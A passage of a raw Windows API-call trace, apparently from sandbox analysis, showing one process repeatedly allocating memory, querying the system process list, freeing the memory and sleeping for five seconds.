SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.479] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.513] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0231.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0231.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0231.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0231.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0231.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0231.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0231.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 